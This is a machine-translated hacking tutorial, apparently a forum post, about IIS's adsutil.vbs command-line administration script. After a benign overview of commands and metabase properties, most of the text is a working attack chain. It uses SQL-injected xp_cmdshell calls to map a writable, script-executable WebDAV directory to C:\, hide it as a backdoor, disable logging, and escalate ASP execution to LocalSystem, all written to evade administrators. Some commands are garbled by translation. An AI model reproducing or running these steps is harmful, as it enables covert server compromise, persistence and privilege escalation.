First, a brief introduction
What is adsutil.vbs? I believe that the network administrator who used IIS will not know. This is an IIS comes with a script that manages IIS in the command line. Located in the% systemDrive% / inetpub / adminsscript directory. There is 95,426 bytes of size. Such a big script will know the powerful function. The fact is true. Basically, I feel it is the "Internet Information Service Manager" in the command line. (In fact, 2000's server has more than 20 VBS files under the% systemDrive% / inetpub / adminsscripts for management. With the 2003, there is only ADSUTIL.VBS. It is enough to explain how complicated its function)
Adding Adsutil.vbs has to mention metabase.bin. This file is the most important profile of IIS. All settings for IIS will eventually be stored in this file. IIS Manager and Adsutil.vbs are displayed to the user by reading configuration information on this file. Metabase.bin's storage structure is very similar to the registry, which is a tree storage structure. IIS Manager and AdsUtil.vbs Access Metabase.bin via an ADSPATH path. The path is made by IIS: /, where localhost represents a local server, while W3SVC represents IIS services. As IIS: / LocalHost / W3SVC / 1 represents the first Web site on the local server. IIS: / localHost / W3SVC / 1 / root / vdir represents the VDIR virtual directory under the first Web site root directory.
With these front knowledge, go back to Adsutil.vbs to see its usage:
C: / inetpub / admin.vbs> cscript adsutil.vbs // Don't forget to type cscript.exe this script host file name
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. all rights reserved.
USAGE:
Adsutil.vbs
Description:
IIS Administration Utility That Enables The Configuration of Metabase Properties
.
Supported commands: // Supported commands. This most important
GET, SET, ENUM, DELETE, CREATE, COPY,
AppCreateInProc, AppCreatePoolProc, Appdlete, Appunload, AP
Pgetstatus
Samples: // Simple example
Adsutil.vbs Get W3SVC / 1 / ServerBindings // View the bonding port of the first virtual web site. The W3SVC / 1 here is an ion: / localhostw3svc / 1, and ServerBindings is his attribute. Same.
Adsutil.vbs Set W3SVC / 1 / ServerBindings ": 81:" // Set the first virtual Web site of the bonded port as 81.
Adsutil.vbs Create W3SVC / 1 / Root / Myvdir "IisWebVirtualDir" // creates a MyvDir virtual directory in the first virtual Web site root directory. The following "IisWebVirtualDir" refers to the type of directory.
Adsutil.vbs Start_server W3SVC / 1 // Start the first virtual Web site.
Adsutil.vbs Enum / P W3SVC // View all sites of IIS.
For Extended Help Type:
Adsutil.vbs Help // If you want further viewing help, type this command. I will not turn here. Prevent someone from saying that I earn a draft fee. Everyone can look at yourself. The words after "//" are all comments I added (below). I believe it should be understood.
The ordsutil.vbs we often have such a few: get, set, enum, delete, create. Now I will explain one by one:
The get command is usually used to view the value values of the directory. SET is used to set the directory properties. ENUM is also used to view properties. The difference is that he directly displayed all set attributes directly. Usually a few pages of things can be seen ... he has an optional "/ P" switch. Plus this switch. He will only list all virtual directories in this directory. The delete command is used to delete the virtual directory. CREATE is a virtual directory. There are also a few commands: start_server, stop_server, pause_server, continue_server. It is started, stopped, suspended, and continues the operation of the virtual site.
The approximate attribute value of a virtual directory is as follows (I only list the possibility of us, otherwise it will be too long):
Keytype: (String) "IisWebVirtualDir" // Directory Type (String) Description It is a string type attribute
Approot: (String) "/ LM / W3SVC / 1 / ROOT" // directory IIS path
AppFriendlyName: (String) "Default Application" // Application Name
Appisolated: (Integer) 2 // Specifying the running process or in the process, digital type properties.
HTTPCUSTOMHEADERS: (1 items) // Custom IIS Data Head
"Powered by: www.wofeiwo.info"
HTTPERRORS: (LIST) (42 items) // The page returned by various IIS code. It can be set yourself. I will be omitted here.
Defaultdoc: (String) "Default.htm, Index.htm, Default.asp, in
Dex.asp, default.php, index.php, default.aspx, index.aspx "// directory's default home page name.
PATH: (String) "D: / ftp" // Directory The physical path of the real map
AccessFlags: (Integer) 513 / / I don't know if this is. Anyway did not set it. It seems to be set automatically
AcceptExecute: (Boolean) false // directory execution permission is Boolean
AccessSource: (Boolean) False // Directory WebDAV Access is allowed
AccessRead: (Boolean) True // Directory read-only permissions
AccessWrite: (Boolean) false // directory write permission
AccessScript: (Boolean) True // Directory Allows execution scripting AccessNoreMoteexecute: (Boolean) False
AccessnoremoteRead: (Boolean) False
Accessnoremotewrite: (Boolean) False
Accessnoremotescript: (Boolean) False
Accessnophysicaldir: (Boolean) False
Scriptmaps: (List) (27 items) // Application Extension mapping
".asa, c: /windows/system32/inetsrv/asp.dll, 5, get, thehead ,post ,trace"
".asp, c: /windows/system32/inetsrv/asp.dll, 5, get, thehead ,post ,trace"
".aspx, c: /windows/microsoft.net/framework/v1.1.4322/ASPNET_ISAPI.DLL, 1, Get, HEA
D, post, defbug
.................. / / omitted N more data here
AspenableParentPaths: (Boolean) True
AppPoolid: (String) "defaultApppool" // application pool name
DONTLOG: (Boolean) True // Prohibits IISLOG Record
Dirbrowseflags: (integer) -1073741762
EnableDirBrowsing: (Boolean) True // Directory Allow column directory
DirbrowShowDate: (Boolean) True // Here below is the parameter settings when the directory is displayed. English is very simple. I don't have much to say.
DirbrowSHOWTIME: (Boolean) TRUE
DirbrowShowSize: (Boolean) True
DirbrowShowExtension: (Boolean) True
DirbrowShowlongDate: (Boolean) True
EnableDefaultDoc: (Boolean) True // Do you turn on the default masterpiece document
The above is what I use the CScript Adsutil.vbs Enum W3SVC / 1 / root command to see it in their own machine. Everyone can also enter the above command research.
We can all set up through the set command. As described below:
Cscript adsutil.vbs set w3svc / 1 / root / directory name / property name setting value
Such as: cscript adsutil.vbs set w3svc / 1 / root / wofeiwo / accessRead 1 // Sets the readable permissions of the WOFEIWO virtual directory under the first virtual Web site for Ture
Or: cscript adsutil.vbs set w3svc / 1 / root / wofeiwo / path "c: /" // Setting the mapped path of the directory is "c: /"
Let's take a look at our simple use.
Second, Adsutil.vbs utilization
(1) Uploading new ideas for MSSQL INJECTION may encounter this situation in the injecting of MSSQL: SA authority. You can execute the CMD command (XP_cmdshell, sp_oacreate, job, etc.). However, the server is in the inside. Outside is a fortress host. Just do an 80-port mapping. 3389 did not use (the internal network can't be connected), all reverse Trojans can't pass (TFTP, FTP, WGET, EXE2BAT, etc.) What should you do this?
Amanl Big Brother classic "squeezing MSSQL last drop" gives us a good idea: using the VBS under the% SystemDrive% / INETPUB / Adminscripts to create a new virtual directory. Customize the absolute path of its mapping. This will bypass a guess for the absolute path of the web. Then you can get a shell by Backup or MaskWebtask backup database or temporary table to virtual directory (or directly echo).
The above ideas are really good. However, how low the success rate of GetWebshell or Little bamboo with smelly, know how low the success rate of Backup or Maskwebtask ... and echo ... I don't want to say it. I'm writing, I'm looking for a crime. (Also do not stop the special character ...)
In fact, we can improve the idea of Amanl big brother. When we build a new virtual directory. Can add a write directory permission. Plus WebDAV ... So we can directly upload any files directly through IIS? It is not only limited to text files. If we upload a reverse back door, it is performed through SA ... Oh, everything is getting it!
Come, immediately implement:
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Create W3SVC / 1 / Root / WOFEIWO "IisWebVirtualDir";
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Cscript Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / PATH "C: /";
Note that the special characters above must be transformed. Or you can perform the above commands with NBSI2 or small SQLCOMM.
This way we have established a WOFEIWO virtual directory in the first Web site, mapping to the C: root directory. I will give him the permissions of reading and writing, in order to have a Webshell, I will add the permission to perform scripts:
EXEC MASTER..XP_CMDSHEC 'CScript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / ROOT / WOFEIWO / AccessRead 1';
Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / accesswrite 1';
EXEC MASTER..XP_CMDSHEC 'CScript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / AccessScript 1';
Writing this SurperHEI "Utilization of IIS Write permissions" may want to construct an HTTP package to upload files. In fact, there is a simpler method: Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / enabledirBrowsing 1';
EXEC MASTER..XP_CMDSHEC 'CScript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / ROOT / WOFEIWO / AccessSource 1';
Set to allow column directory and WebDAV access, then open your IE, Ctrl O Open "Open" and type the virtual directory you just set up. Select "Open in Web Folder" to determine. Figure:
Figure one
Ah! Will you see all the folders? as the picture shows:
Figure II
Now you can operate the above files like a normal folder. Also ctrl c, Ctrl V copy file. Easy to upload, modify files.
(2) Furthermore
In fact, we can use the idea that the idea mentioned above can be used to make an IIS back door. Come, see my realization! (Here, the method introduced in the "almost perfect IIS back door". But I have completed the settings with the tools that comes with Adsutil.vbs this MS. I can find themselves. Look.)
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Create W3SVC / 1 / Root / WOFEIWO "IisWebVirtualDir"; - // Build a WOFEIWO directory.
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Create W3SVC / 1 / Root / WOFEIWO / DOR "IISWebVirtualDir"'; - // The DOOR directory has been established in the WOFEIWO directory.
Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs cscript adsutil.vbs set w3svc / 1 / root / wofeiwo / door / path "c: /"; - // Setup Directory Map to the C: root directory.
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / DOOR / AccessRead 1'; - // Here, you will set a certain permission to the directory. . You can refer to the above command notes.
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / DOOR / AccessWrite 1';
Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs SET w3svc / 1 / Root / wofeiwo / door / AccessScript 1'; - Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / INETPUB / ADMINSCRIPTS / ADSUTIL.VBS SET W3SVC / 1 / ROOT / WOFEIWO / DOOR / DONTLOG 1 ';
Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / door / enabledirBrowsing 1';
Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / door / accesssource 1';
Exec master..xp_cmdshell 'cscript.exe% systemDrive% / inetpub / adminsscripts / adsutil.vbs set w3svc / 1 / root / wofeiwo / door / accessexecute 1';
Some people may say, what Ah is. Isn't it the same as the above? Ha ha. In fact, you look carefully. Will find that our new first directory "WOFEIWO" is not set up "path" properties. That is to say, he is not mapped to any actual directory. A vulnerability of IIS (involved in IIS5.0.1.0) here is applied. That is, the virtual directory without "path" attribute is not appeared in the IIS Manager. It is equivalent to a hidden directory. The virtual directory "door" under this is also due to the unachable superior directory, so it is also invisible! But the "door" directory is set up "path" properties. So if we submit
Http: // ip / wofeiwo / door / path. The result is that the file directory under the C: below. Now this directory is already we can write file read files. And can also be transferred to the SYSTEM32 directory. Our back door is built. (Note I am here to add AccessExecute execution permission)
But what we currently execute is still a guest of IIS default IUSR users. Without big permissions, we are always unhappy. Below to enhance our permissions, add IUSR users to not say it for administrators. Let's talk about two ways:
1. Set the Appisolated so that the program in this directory is performed in the IIS process. This inherits IIS's System authority.
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Set W3SVC / 1 / Root / WOFEIWO / DOOR / AppiSolated 0';
2. Add the Asp.dll of the ASP file to the IIS's privileged DLL. This makes it run in the process. Thereby, to the Localsystem permission of IIS.
1) First get all the privileges DLL of IIS
Exec master..xp_cmdshell 'cscript.exe% SystemDrive% / INETPUB / Adminscripts / Adsutil.vbs Get W3SVC / INPROCESSISAPIAPPS'
return:
Inprocessisapiapps: (List) (5 items) "c: /windows/system32/inetsrv/httpext.dll"
"C: / windows/system32/inetsrv/httpodbc.dll"
"C: /windows/system32/inetsrv/ssinc.dll"
"C: /Windows/system32/msw3prt.dll"
"C: /Windows / Microsoft.Net/framework/v1.1.4322/ASPNET_ISAPI.DLL"
2) Set the asp.dll to the InProcessisapiapps group, hereby pay attention, add all the DLLs that you find above, otherwise it will be deleted.
Exec Master..Xp_CmdShell 'Cscript.exe% SystemDrive% / Inetpub / AdminScripts / adsutil.vbs SET w3svc / InProcessIsapiApps "C: /WINDOWS/system32/inetsrv/httpext.dll" "C: / WINDOWS / system32 / inetsrv / httpodbc. DLL "C: /Windows/system32/inetsrv/ssinc.dll" "c: /windows/system32/msw3prt.dll" "c: /windows/microsoft.net/framework/v1.1.4322/ASPNET_ISAPI.DLL" "C : /Windows/system32/inetsrv/asp.dll "'; -
return:
InProcessisapiapps: (List) "C: /Windows/system32/inetsrv/httpext.dll" "c: /windows/system32/inetsrv/httpodbc.dll" C: /Windows/system32/inetsrv/ssinc.dll "C: / Windows/system32/msw3prt.dll "C: /Windows/Microsoft.net/framework/v1.1.4322/ASPNET_ISAPI.DLL" "C: /Windows/system32/inetsrv/asp.dll"
This is set up. Whether there is any ASP file, it is LOACLSYSTEM privilege. Through the above steps. Our IIS back door is basically set. You can upload ASP Trojans to assist control. Such set up the back door is difficult to be discovered by the administrator. And fully communicate with the 80 port of IIS. There is no log record. So quite safe.
Third, context
Here I ended here about ADSUTIL.VBS. Suddenly I found out so much article. Wow, ah ... the article is very tired. Since I am a vegetarian. The article is inevitably omissue. Also, please advise. If you have any questions, please contact me. My email: wofeiw@bugkidz.org. Or everyone can go to Firefox Technology Alliance
Http://www.wrsky.com came to me. My ID: I am not me. It is a new master of the forum.
